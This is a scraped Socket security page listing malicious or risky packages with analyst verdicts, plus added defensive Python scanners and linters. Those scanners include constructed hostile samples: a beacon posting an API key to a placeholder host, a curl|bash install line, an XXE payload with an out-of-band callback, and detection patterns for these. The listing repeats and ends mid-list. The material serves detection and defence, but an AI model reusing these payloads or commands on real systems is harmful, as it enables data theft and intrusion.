Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery: timmywil published 4.0.0

left-pad: stevemao published 1.3.0

react: react-bot published 19.2.5

We protect you from vulnerable and malicious packages

abc-0329

1654928688

Live on pypi

Blocked by Socket

This module functions as a persistent network beacon: it collects public IP and geolocation metadata, tags it with a hardcoded API key and a function label, and repeatedly transmits the data in cleartext to an obscure remote endpoint. It contains multiple indicators of malicious or privacy-invasive behavior: hardcoded credentials, plaintext exfiltration to an unknown domain, an infinite loop with silent exception handling, and no user consent or safeguards. Treat as high risk: do not run it in production or on sensitive hosts. If found in a codebase or installed package, isolate the host, investigate outbound connections to uif01.xyz and calls to ip-api.com, and remove or replace the component. Further investigation of the remote domain and the API key owner is recommended.
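
The indicators listed above (a hardcoded key, a cleartext URL, an infinite loop around a network call, a silent exception handler) can each be recognised syntactically, and their combination is what makes the verdict. The following Python scanner is an added example written for this page; it is not the abc-0329 package's code and not Socket's analyser. It runs over a constructed snippet that mirrors the described behaviour; the domains, key and labels in that snippet are placeholders, not indicators taken from the package.

```python
"""Heuristic static scan for beacon/exfiltration indicators in Python source.

Added example: not the abc-0329 package's code and not Socket's scanner. SAMPLE is
constructed to mirror the behaviour described on the page; its domains, key and
labels are placeholders.
"""
import ast
import re

# Constructed sample modelled on the described behaviour (placeholders only).
SAMPLE = '''
import time, requests
API_KEY = "sk_live_0123456789abcdefghijklmnop"
def beacon():
    while True:
        try:
            geo = requests.get("http://ip-api.example/json").json()
            requests.post("http://beacon.example/collect",
                          json={"k": API_KEY, "fn": "init", "geo": geo})
        except Exception:
            pass
        time.sleep(60)
'''

# A credential-looking assignment: telling variable name plus a long opaque literal.
SECRET_NAME = re.compile(r"(key|token|secret|passw)", re.I)
SECRET_VALUE = re.compile(r"^(AKIA[0-9A-Z]{16}|sk_live_[A-Za-z0-9]{16,}|[A-Za-z0-9_\-]{20,})$")
# Method names that indicate a network send in requests/urllib/socket-style APIs.
NETWORK_CALLS = {"get", "post", "put", "urlopen", "request", "send", "sendto", "connect"}


def _is_network_call(node: ast.AST) -> bool:
    return (isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and node.func.attr in NETWORK_CALLS)


def _is_silent_handler(h: ast.ExceptHandler) -> bool:
    """`except ...: pass` (or `...`) swallows every error, hiding failures from the user."""
    if len(h.body) != 1:
        return False
    stmt = h.body[0]
    return isinstance(stmt, ast.Pass) or (
        isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Constant)
        and stmt.value.value is Ellipsis)


def scan(source: str) -> list:
    """Return sorted (indicator, line) pairs found in `source`."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        # 1. Hardcoded credential: NAME = "long opaque literal" with a telling name.
        if isinstance(node, ast.Assign) and isinstance(node.value, ast.Constant) \
                and isinstance(node.value.value, str):
            for tgt in node.targets:
                if isinstance(tgt, ast.Name) and SECRET_NAME.search(tgt.id) \
                        and SECRET_VALUE.match(node.value.value):
                    findings.append(("hardcoded_credential", node.lineno))
        # 2. Cleartext transport: any string literal that is a plain http:// URL.
        if isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and node.value.startswith("http://"):
            findings.append(("cleartext_http_url", node.lineno))
        # 3. Persistent beacon: `while True` whose body performs a network call.
        if isinstance(node, ast.While) and isinstance(node.test, ast.Constant) \
                and node.test.value is True \
                and any(_is_network_call(n) for n in ast.walk(node)):
            findings.append(("infinite_loop_with_network_call", node.lineno))
        # 4. Silent exception handling.
        if isinstance(node, ast.ExceptHandler) and _is_silent_handler(node):
            findings.append(("silent_exception_handler", node.lineno))
    return sorted(set(findings), key=lambda f: (f[1], f[0]))


def verdict(findings) -> str:
    """Any one indicator is common in benign code (retry loops, telemetry); the
    beacon pattern is all four together."""
    kinds = {k for k, _ in findings}
    return "beacon_pattern" if len(kinds) == 4 else "review"


if __name__ == "__main__":
    found = scan(SAMPLE)
    for kind, line in found:
        print(f"line {line}: {kind}")
    print("verdict:", verdict(found))
```

The scanner is deliberately conservative: each indicator on its own would flag plenty of legitimate packages, so only the full combination produces the beacon verdict. A production rule set would additionally weigh where the code runs (an install hook versus a library function that is only called on demand) and whether the endpoint is a known service.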

biliup-ruinmi

1.0.7

Live on pypi

Blocked by Socket

This code is not typical benign utility code; it is an intentionally obfuscated fingerprinting and request-sign generation library. It collects broad device/browser signals (including local IPs via WebRTC, canvas/WebGL fingerprints, plugins, fonts, cookies, battery, event timing) and encodes them into a signed token (X-Bogus) and/or appends them to report URLs. It does not spawn system shells or run arbitrary OS commands, but it is privacy-invasive and designed to track or strongly identify clients and to support anti-bot measures — potentially undesirable in many contexts. Use of this module should be considered a privacy and tracking risk; evaluate legal/privacy implications before using. If your threat model treats fingerprinting as malicious, avoid using this package or audit it thoroughly and disclose to users.

discord-selfbot-mcp

1.2.8

by microck

Live on npm

Blocked by Socket

This code is a high-risk credential-harvesting and persistence tool. It can automatically extract a Discord user token from the Discord login web app using browser automation and in-page evaluation, then writes that token in plaintext into local MCP configuration files (and backups) as DISCORD_TOKEN so a downstream command can reuse it. This behavior is consistent with malicious “selfbot” enablement and unauthorized Discord automation; it should be treated as malware-level risk in supply-chain contexts. Users should assume the token could already be compromised and should revoke/rotate any Discord tokens used with it and audit written config locations.

aespm

1.0.0

Removed from pypi

Blocked by Socket

The package performs remote command execution and file operations on inputs that are not validated, and it embeds sensitive credentials in the code. That combination makes exploitation straightforward: do not install it, and treat any credentials it carries as exposed.

Live on pypi for 23 minutes before removal. Socket users were protected even while the package was live.

io.github.reajason:generator

2.4.2

Live on maven

Blocked by Socket

This class is a malicious webshell/memshell implementation. It listens for a hidden HTTP header trigger and then interprets specially encoded request bodies to create, manage and use persistent in-memory tunnels and HTTP redirects/proxies to arbitrary target hosts. It disables SSL verification for proxied HTTPS connections, spawns background threads, and persists tunnel state in a static Hashtable. This functionality allows remote attackers to create covert bidirectional tunnels and exfiltrate or relay data over HTTP(S), and is a high-risk supply-chain/backdoor artifact. Remove it and treat the host as compromised.

354766/ilude/claude-code-config/devcontainer-workflow/

d419aa6db764fa5d8a29bc07000e6c4fdb650e6c

Live on socket

Blocked by Socket

[Skill Scanner] Installation of third-party script detected. All findings, 13 CRITICAL and 12 HIGH: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4], 6 occurrences; [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4], 7 occurrences; [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4], 2 occurrences; [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3], 10 occurrences.

This devcontainer skill is functionally coherent and aligned with its stated purpose: setting up a privileged development container environment for Python with uv and optional Docker-in-Docker. It does not contain hidden obfuscation or explicit malicious code. However it documents several high-risk, by-design practices: mounting the host SSH directory, exposing the Docker socket, and creating a NOPASSWD sudo user. Those features are acceptable for trusted local development but are dangerous if used in untrusted environments or with unreviewed repositories because they allow privilege escalation and potential access to host secrets. The pull from ghcr.io using the 'latest' tag is a minor supply-chain risk unless pinned. Recommend restricting these features to trusted contexts, pinning external artifacts, and avoiding NOPASSWD sudo where not necessary. LLM verification: The code fragment presents a legitimate DevContainer-based development workflow with standard best practices (multi-stage builds, non-root user, Python tooling) and acceptable trade-offs for development environments. Key risk areas are Docker-in-Docker usage and NOPASSWD sudo privileges within the container; these should be restricted to trusted, isolated contexts and clearly documented as development-only. No active malicious behavior is evident in the fragment itself, but ongoing vigilance is

freecdn-publib

0.1.1

by freecdn

Live on npm

Blocked by Socket

The file does not contain readable source code; it appears to be a binary payload. An opaque binary where source is expected cannot be reviewed and is a classic way to embed malware in a software package. The package should be considered malicious and extremely dangerous. Do not use.

github.com/yaklang/yaklang

v1.2.5-sp1

Live on go

Blocked by Socket

This Go source contains routines that speak the T3 protocol to connect to Oracle WebLogic servers and deploy a serialized-Java RMI backdoor. It checks for the presence of a class named “com.supeream.payload,” installs a malicious payload if absent, then invokes arbitrary OS commands on the target and can clean up the backdoor afterward. Payload templates reference a default endpoint t3://47[.]104[.]229[.]232:7001, which is dynamically replaced with the victim IP/port. The hex-encoded Java object streams hide the backdoor installer/uninstaller and command execution logic, representing a high-severity malware threat.

how-to-get-free-xbox-card-codes607

1.0.2

by muhammadharunmiya44

Removed from npm

Blocked by Socket

The script seems to be part of a spamming operation and uses bad security practices, such as hardcoding paths and credentials. Therefore, it's a potential security risk.

Live on npm for 17 hours and 22 minutes before removal. Socket users were protected even while the package was live.

t7wjbj2e9u3r

2.9.2

by leapteam

Live on npm

Blocked by Socket

The code is obfuscated, a technique frequently used to hide malicious intent, but without decoding it the purpose and risk cannot be assessed, and the automated reports available for it provide no insight. Further analysis is required to decode and understand the obfuscated string.

bigdl-orca-spark2

2.5.0b20231218

Live on pypi

Blocked by Socket

The code contains potential security risks such as hard-coded file paths, subprocess.Popen usage, and the handling of untrusted data through PyArrow Plasma. It is essential to review and address these security concerns before using this code in a production environment.

leadingsystems/contao-merconis

dev-attribute-value-frontend-sorting

Live on composer

Blocked by Socket

Conclusion: The Merconis InstallerController exhibits high-risk characteristics due to the presence of an obfuscated eval payload that could execute arbitrary code, combined with remote content downloads and reconstructive file operations during installation. While some safeguards exist (MD5 hash checks, which do not protect against a deliberately crafted collision, and prepared statements in many paths), the obfuscated runtime code execution and reliance on external data/resources create substantial supply-chain and remote-code-execution risks. A secure review should decode the eval payload, verify its purpose, ensure all downloads are strictly authenticated and delivered over TLS with integrity checks, and replace any dynamic code execution and untrusted deserialization with safe, auditable alternatives.

capesolo

0.4.20

Live on pypi

Blocked by Socket

This module contains multiple high-risk behaviors consistent with tools intended to evade detection and modify system identity and state: changing MachineGuid/ProductId, modifying Office security and MRU entries, masking virtualization indicators, attempting system-level execution via psexec, and adding persistent routes. While not showing explicit data exfiltration or a remote backdoor in this fragment, the operations are commonly used by malware for persistence, anti-analysis, and anti-forensics. Treat this package as malicious or highly dangerous unless you have a verified, legitimate, documented use-case and strict controls.

github_chatops_extensions

9999.9999.9999

by Ohio Schools R1 Admin

Live on rubygems

Blocked by Socket

This code collects system-identifying data (username, hostname, file path), hex-encodes it, constructs a domain under a hardcoded external base ('furb.pw') embedding that data into subdomain labels, and issues an HTTPS GET to that domain — a clear data-exfiltration pattern. The behavior is malicious or at minimum privacy-invasive telemetry sent to an external third party. The package should not be trusted or used without removal of the network exfiltration logic and a full audit.
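
Hex-encoded subdomain labels of the kind described above are easy to decode once the base domain is known, which makes DNS query logs the quickest way to scope what left a host. The following is an added example, not code from the gem or from Socket; the log lines are constructed in dnsmasq's query-log format, and exfil.example stands in for the hardcoded base domain.

```python
"""Decode hex-label DNS exfiltration from query logs.

Added example, not code from the github_chatops_extensions gem or from Socket.
LOG_LINES are constructed (dnsmasq `query[A] <name> from <ip>` format); the base
domain and the encoded values are placeholders, not observed data.
"""
import re
from collections import defaultdict
from typing import List, Optional

BASE_DOMAIN = "exfil.example"  # placeholder for the hardcoded base domain

# Constructed sample: two hosts beaconing, plus ordinary traffic that must not match.
LOG_LINES = [
    "Jan 12 10:00:01 dnsmasq[812]: query[A] 616c696365.6275696c642d3031.2f6f70742f6170702f72756e2e7262.exfil.example from 10.0.0.5",
    "Jan 12 10:00:02 dnsmasq[812]: query[A] www.example.com from 10.0.0.5",
    "Jan 12 10:00:03 dnsmasq[812]: query[A] 726f6f74.63692d72756e6e6572.2f7661722f6c69622f6a656e6b696e732f6a6f622e7262.exfil.example from 10.0.0.9",
    "Jan 12 10:00:04 dnsmasq[812]: query[A] api.exfil.example from 10.0.0.9",
]

QUERY_RE = re.compile(r"query\[\w+\] (?P<name>\S+) from (?P<src>\S+)")
HEX_LABEL = re.compile(r"^[0-9a-fA-F]+$")


def encode_name(values, base: str = BASE_DOMAIN) -> str:
    """Build the query name the way the described code does: one hex label per value.
    DNS labels are limited to 63 octets, so each value must be at most 31 bytes."""
    return ".".join(v.encode("utf-8").hex() for v in values) + "." + base


def decode_labels(name: str, base: str) -> Optional[List[str]]:
    """Return the decoded labels under `base` if every label is even-length hex
    that decodes to UTF-8 text; otherwise None (ordinary traffic)."""
    if not name.endswith("." + base):
        return None
    decoded = []
    for label in name[: -len(base) - 1].split("."):
        if len(label) % 2 or not HEX_LABEL.match(label):
            return None
        try:
            decoded.append(bytes.fromhex(label).decode("utf-8"))
        except UnicodeDecodeError:
            return None
    return decoded


def find_exfil(lines, base: str = BASE_DOMAIN) -> dict:
    """Map source IP -> list of decoded (username, hostname, path) tuples."""
    hits = defaultdict(list)
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        decoded = decode_labels(m["name"], base)
        if decoded:
            hits[m["src"]].append(tuple(decoded))
    return dict(hits)


if __name__ == "__main__":
    for src, records in find_exfil(LOG_LINES).items():
        for rec in records:
            print(src, "->", rec)
```

Because the query goes out over DNS, it is answered by whichever resolver the host uses, so the recursive resolver's logs (or passive DNS) are the place to look even when the process made no direct HTTP connection; block the base domain at the resolver and treat every source IP that appears as a host that ran the package.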

github.com/weaveworks/weave

v0.11.1-0.20150527131451-84874b967678

Live on go

Blocked by Socket

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

354766/feiskyer/openclaw-kubernetes/claude-skill/

426dd532ac541acd3c3771f5da7fe9997462487a

Live on socket

Blocked by Socket

The analyzed skill is coherent with an end-to-end Claude Code automation framework, including isolation, logging, and PR lifecycle management. Security concerns center on permission-bypass capabilities, autonomous long-running execution, and access to logs/registries that may reveal prompts or intents. Governance controls, least-privilege prompts, strict access controls for logs/registries, and per-action approvals are recommended to mitigate risk. Overall, the design is powerful but requires careful sandboxing and operational governance.

fray

3.5.109

Live on pypi

Blocked by Socket

This JSON is an explicit, weaponized catalog of HTTP request smuggling payloads and evasion techniques. It is high-risk: the payloads enable request smuggling, response queue poisoning, session/token capture, reflected XSS, and open-redirect attacks when sent to vulnerable HTTP stacks. The file is data-only (no active code), but its distribution or inclusion in broadly-available packages/tooling without strict access controls or clear authorization guidance poses a substantial security risk. Treat as offensive test material — permit only in controlled, authorized security-testing contexts and avoid bundling into production dependencies or public libraries.

harekrishnarai/flowlyt

32aeefd04ca1535dfdbd574c029270d484b37974

Live on actions

Blocked by Socket

This workflow is intentionally insecure and contains many clear supply-chain and CI/CD attack vectors: command injection (eval/exec/Invoke-Expression/pipe-to-bash), remote script execution (curl | bash), use of untrusted/typosquatted/unpinned actions, secrets passed to untrusted actions or printed, cross-repo access with tokens, and risky self-hosted privileged operations. It should not be used as-is in production. Mitigations include: never execute untrusted event data, avoid pull_request_target for running untrusted code, pin and verify actions, do not pass secrets to third-party or unverified actions, avoid curl|bash and running untrusted docker images privileged, and restrict self-hosted runners. Treat this workflow as malicious/insecure.
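
Most of the mitigations listed above are mechanically checkable. The following line-based linter is an added example, not the flowlyt workflow itself and not Socket's scanner; the constructed WORKFLOW reproduces several of the patterns, with placeholder action owners, secrets and URLs, and the 40-hex SHA in it is a dummy pin rather than a real commit.

```python
"""Lint a GitHub Actions workflow for the CI/CD weaknesses listed above.

Added example, not the flowlyt workflow and not Socket's analyser. WORKFLOW is a
constructed workflow; owners, secrets, URLs and the SHA pin are placeholders.
"""
import re

WORKFLOW = """\
name: ci
on:
  pull_request_target:
    types: [opened]
jobs:
  build:
    runs-on: self-hosted
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: someuser/action-setup@main
        with:
          token: ${{ secrets.DEPLOY_TOKEN }}
      - run: echo "Title: ${{ github.event.pull_request.title }}"
      - run: curl -sSL https://get.example.com/install.sh | bash
      - run: eval "$CMD"
      - run: echo "${{ secrets.API_KEY }}"
"""

USES = re.compile(r"^\s*-?\s*uses:\s*(?P<ref>\S+)")
RUN = re.compile(r"^\s*-?\s*run:\s*(?P<cmd>.+)$")
SHA_PIN = re.compile(r"@[0-9a-f]{40}$")          # immutable pin; tags and branches are not
EVENT_EXPR = re.compile(r"\$\{\{\s*github\.event\.")  # attacker-controlled PR/issue fields
SECRET_EXPR = re.compile(r"\$\{\{\s*secrets\.")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z)?sh\b")
EVAL = re.compile(r"\beval\b|\bexec\b|Invoke-Expression")

TRUSTED_OWNERS = {"actions", "github"}  # assumption: first-party owners you choose to trust


def lint(text: str) -> list:
    """Return (line, rule, detail) findings. Handles single-line `run:` steps only;
    a real linter parses the YAML and also inspects block scalars (`run: |`)."""
    findings = []
    last_uses = None  # most recent `uses:` ref, so its `with:` inputs can be attributed
    for n, line in enumerate(text.splitlines(), 1):
        if re.match(r"^\s*pull_request_target:", line):
            findings.append((n, "pull_request_target", "PR-controlled code runs with a write token"))
        if re.match(r"^\s*runs-on:\s*self-hosted", line):
            findings.append((n, "self_hosted_runner", "untrusted code on a persistent runner"))
        m = USES.match(line)
        if m:
            last_uses = m["ref"]
            if not SHA_PIN.search(last_uses):
                findings.append((n, "unpinned_action", last_uses))
            continue
        m = RUN.match(line)
        if m:
            cmd = m["cmd"].strip()
            if EVENT_EXPR.search(cmd):
                findings.append((n, "expression_injection", cmd))
            if PIPE_TO_SHELL.search(cmd):
                findings.append((n, "pipe_to_shell", cmd))
            if EVAL.search(cmd):
                findings.append((n, "eval_in_run", cmd))
            if SECRET_EXPR.search(cmd) and "echo" in cmd:
                findings.append((n, "secret_printed", cmd))
            continue
        # Remaining lines are step inputs (`with:` values) or top-level keys.
        if last_uses and "checkout" in last_uses and re.search(r"ref:.*github\.event\.pull_request", line):
            findings.append((n, "checkout_of_untrusted_ref", last_uses))
        if last_uses and SECRET_EXPR.search(line):
            owner = last_uses.split("/")[0]
            if owner not in TRUSTED_OWNERS or not SHA_PIN.search(last_uses):
                findings.append((n, "secret_to_unverified_action", last_uses))
    return findings


if __name__ == "__main__":
    for n, rule, detail in lint(WORKFLOW):
        print(f"line {n}: {rule}: {detail}")
```

The checkout rule matters in combination with the trigger: under pull_request_target the workflow holds the repository's write token, so checking out the PR head and then running anything from it hands that token to the PR author. Pinning to a commit SHA is what the "pin and verify" advice means in practice; a tag such as @v4 can be moved by whoever controls the action repository.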

warnermedia-test

1.0.0

by m0chan-hackerone

Live on npm

Blocked by Socket

This install script performs active data exfiltration and network beaconing to an external domain, leaking local user and environment information. This behavior is malicious or at minimum highly suspicious telemetry/privacy-invasive activity and could be used for tracking, reconnaissance, or as part of a command-and-control mechanism. It should be treated as malware and blocked unless you fully trust and control the receiving domain and purpose.

lyte-dom

5.459.1

by hzoho

Removed from npm

Blocked by Socket

The code may be used for malicious purposes. It collects sensitive information (environment variables) and sends them to a potentially dangerous host. This could lead to sensitive data leakage.

Live on npm for 1 hour and 23 minutes before removal. Socket users were protected even while the package was live.

fsd

0.1.619

Removed from pypi

Blocked by Socket

This module zips a local directory and uploads it to a specific S3 bucket. The code contains hardcoded AWS credentials and a hardcoded bucket name, which is a severe security issue and could enable data exfiltration if these credentials are valid. There are additional problems: a likely return-value bug (undefined variable s3_ke), possible insufficient path-safety around symlinks, and verbose logging of paths. There is no evidence of obfuscation or active payloads like reverse shells or eval-based code execution. Treat this package as high-risk until credentials are removed/rotated and the code is corrected and reviewed.

Live on pypi for 5 days, 5 hours and 56 minutes before removal. Socket users were protected even while the package was live.

hexstrike-ai

0.1.0

Removed from pypi

Blocked by Socket

This module is an active XXE exploitation tool designed to read local files from a target XML parser and to exfiltrate data via an out-of-band HTTP callback to a hardcoded attacker-controlled domain. It is offensive in nature and poses a high security risk if used without authorization. Use only in authorized penetration tests with explicit permission; otherwise treat the tool as malicious. Remediation for targets: disable external entity resolution, use secure XML parsers that disallow DTDs/entities, apply input validation, and block outbound HTTP to untrusted destinations.
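
The target-side remediation above (disable external entity resolution, disallow DTDs) comes down to rejecting the DOCTYPE before the parser sees it, and for incident triage that same DTD tells you which local file and which callback host a payload targeted. The following is an added example, not the hexstrike-ai module's code; XXE_DOC is a constructed payload of the shape described, and its file path and callback host are placeholders.

```python
"""Reject DTDs before parsing, and extract XXE targets from a captured payload.

Added example, not the hexstrike-ai module. XXE_DOC is constructed; the file path
and callback host in it are placeholders.
"""
import re
import xml.etree.ElementTree as ET

# Constructed attacker input: one entity reads a local file, one parameter entity
# fetches an out-of-band URL so the attacker learns the parse happened.
XXE_DOC = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "file:///etc/hostname">
  <!ENTITY % oob SYSTEM "http://callback.example/collect">
  %oob;
]>
<data>&file;</data>"""

BENIGN_DOC = "<order><item sku='A1'>2</item></order>"

DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)
# <!ENTITY [%] name SYSTEM "uri"> or <!ENTITY [%] name PUBLIC "pubid" "uri">
ENTITY_DECL = re.compile(
    r'<!ENTITY\s+(%\s*)?(?P<name>[^\s>]+)\s+(SYSTEM|PUBLIC)\s+(?:"[^"]*"\s+)?"(?P<uri>[^"]*)"',
    re.I,
)


def extract_external_refs(doc: str) -> list:
    """List (entity name, URI) for every external entity declared in an inline DTD.
    Useful in triage: it names the file read and the callback host to block."""
    return [(m["name"], m["uri"]) for m in ENTITY_DECL.finditer(doc)]


def safe_parse(doc: str) -> ET.Element:
    """Parse XML only if it carries no DOCTYPE, and therefore no entity declarations.
    Rejecting up front does not depend on per-library parser defaults, which differ."""
    if DOCTYPE.search(doc):
        raise ValueError(f"DTD not allowed; external references: {extract_external_refs(doc)}")
    return ET.fromstring(doc)


if __name__ == "__main__":
    print(extract_external_refs(XXE_DOC))
    try:
        safe_parse(XXE_DOC)
    except ValueError as e:
        print("rejected:", e)
    print(safe_parse(BENIGN_DOC).tag)
```

A blanket DOCTYPE ban also closes entity-expansion denial of service (no internal entities either) and is simpler to audit than configuring each parser's feature flags; if an application genuinely needs a DTD, it should whitelist a fixed one rather than accept it from the input. The extracted URIs feed the last remediation listed above: the callback host is what outbound filtering needs to block.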

Live on pypi for 14 days, 18 hours and 42 minutes before removal. Socket users were protected even while the package was live.

@nexthink/remote-action-widgets

1.11.6

by nxt-fmiquel

Removed from npm

Blocked by Socket

The script collects environment variables, hostname, package name, and network interface information, and sends it to a remote server. Although the comment claims no harmful code is executed, this can still lead to information leakage.

Live on npm for 2 minutes before removal. Socket users were protected even while the package was live.

@radancy/dropr-client

99.0.0

by radancy

Live on npm

Blocked by Socket

This file collects system details (such as hostname, user account, platform, and domain information) and transmits them to the remote domain bugbounty[.]click. It disables TLS certificate validation (NODE_TLS_REJECT_UNAUTHORIZED=0), enabling potential man-in-the-middle attacks. This behavior equates to data exfiltration and represents a severe security risk.

abc-0329

1654928688

Live on pypi

Blocked by Socket

This module functions as a persistent network beacon that collects public IP and geolocation metadata, tags it with a hardcoded API key and a function label, and repeatedly transmits the data in cleartext to an obscure remote endpoint. It contains multiple indicators of malicious or privacy-invasive behavior: hardcoded credentials, plaintext exfiltration to an unknown domain, infinite looping with silent exception handling, and no user consent or safeguards. Treat as high risk: do not run in production or on sensitive hosts. If found in a codebase or installed package, isolate the host, investigate outbound connections to uif01.xyz and ip-api.com calls, and remove or replace the component. Further investigation of the remote domain and the API key owner is recommended.

biliup-ruinmi

1.0.7

Live on pypi

Blocked by Socket

This code is not typical benign utility code; it is an intentionally obfuscated fingerprinting and request-sign generation library. It collects broad device/browser signals (including local IPs via WebRTC, canvas/WebGL fingerprints, plugins, fonts, cookies, battery, event timing) and encodes them into a signed token (X-Bogus) and/or appends them to report URLs. It does not spawn system shells or run arbitrary OS commands, but it is privacy-invasive and designed to track or strongly identify clients and to support anti-bot measures — potentially undesirable in many contexts. Use of this module should be considered a privacy and tracking risk; evaluate legal/privacy implications before using. If your threat model treats fingerprinting as malicious, avoid using this package or audit it thoroughly and disclose to users.

discord-selfbot-mcp

1.2.8

by microck

Live on npm

Blocked by Socket

This code is a high-risk credential-harvesting and persistence tool. It can automatically extract a Discord user token from the Discord login web app using browser automation and in-page evaluation, then writes that token in plaintext into local MCP configuration files (and backups) as DISCORD_TOKEN so a downstream command can reuse it. This behavior is consistent with malicious “selfbot” enablement and unauthorized Discord automation; it should be treated as malware-level risk in supply-chain contexts. Users should assume the token could already be compromised and should revoke/rotate any Discord tokens used with it and audit written config locations.

aespm

1.0.0

Removed from pypi

Blocked by Socket

The code presents significant security risks, particularly through remote command execution and file operations. The potential for exploitation is high due to the lack of input validation and the use of sensitive credentials. Proper security measures should be implemented to mitigate these risks.

Live on pypi for 23 minutes before removal. Socket users were protected even while the package was live.

io.github.reajason:generator

2.4.2

Live on maven

Blocked by Socket

This class is a malicious webshell/memshell implementation. It listens for a hidden HTTP header trigger and then interprets specially encoded request bodies to create, manage and use persistent in-memory tunnels and HTTP redirects/proxies to arbitrary target hosts. It disables SSL verification for proxied HTTPS connections, spawns background threads, and persists tunnel state in a static Hashtable. This functionality allows remote attackers to create covert bidirectional tunnels and exfiltrate or relay data over HTTP(s), and is a high risk supply-chain/backdoor artifact. Remove and treat as compromise.

354766/ilude/claude-code-config/devcontainer-workflow/

d419aa6db764fa5d8a29bc07000e6c4fdb650e6c

Live on socket

Blocked by Socket

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] 
data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] This devcontainer skill is functionally coherent and aligned with its stated purpose: setting up a privileged development container environment for Python with uv and optional Docker-in-Docker. It does not contain hidden obfuscation or explicit malicious code. However it documents several high-risk, by-design practices: mounting the host SSH directory, exposing the Docker socket, and creating a NOPASSWD sudo user. Those features are acceptable for trusted local development but are dangerous if used in untrusted environments or with unreviewed repositories because they allow privilege escalation and potential access to host secrets. The pull from ghcr.io using the 'latest' tag is a minor supply-chain risk unless pinned. Recommend restricting these features for trusted contexts, pinning external artifacts, and avoiding NOPASSWD sudo where not necessary. LLM verification: The code fragment presents a legitimate DevContainer-based development workflow with standard best practices (multi-stage builds, non-root user, Python tooling) and acceptable trade-offs for development environments. Key risk areas are Docker-in-Docker usage and NOPASSWD sudo privileges within the container; these should be restricted to trusted, isolated contexts and clearly documented as development-only. No active malicious behavior is evident in the fragment itself, but ongoing vigilance is

freecdn-publib

0.1.1

by freecdn

Live on npm

Blocked by Socket

The file does not contain readable source code; it appears to be a binary payload. This is a classic sign of malware embedded in a software package. The package should be considered malicious and extremely dangerous. Do not use.

github.com/yaklang/yaklang

v1.2.5-sp1

Live on go

Blocked by Socket

This Go source contains routines that speak the T3 protocol to connect to Oracle WebLogic servers and deploy a serialized-Java RMI backdoor. It checks for the presence of a class named “com.supeream.payload,” installs a malicious payload if absent, then invokes arbitrary OS commands on the target and can clean up the backdoor afterward. Payload templates reference a default endpoint t3://47[.]104[.]229[.]232:7001, which is dynamically replaced with the victim IP/port. The hex-encoded Java object streams hide the backdoor installer/uninstaller and command execution logic, representing a high-severity malware threat.

how-to-get-free-xbox-card-codes607

1.0.2

by muhammadharunmiya44

Removed from npm

Blocked by Socket

The script seems to be part of a spamming operation and uses bad security practices, such as hardcoding paths and credentials. Therefore, it's a potential security risk.

Live on npm for 17 hours and 22 minutes before removal. Socket users were protected even while the package was live.

t7wjbj2e9u3r

2.9.2

by leapteam

Live on npm

Blocked by Socket

The code is obfuscated, which is often used to hide malicious intent, but without further context or decoding, it's impossible to definitively assess its purpose or risk. The reports are invalid and provide no insight. Further analysis is required to decode and understand the string.

bigdl-orca-spark2

2.5.0b20231218

Live on pypi

Blocked by Socket

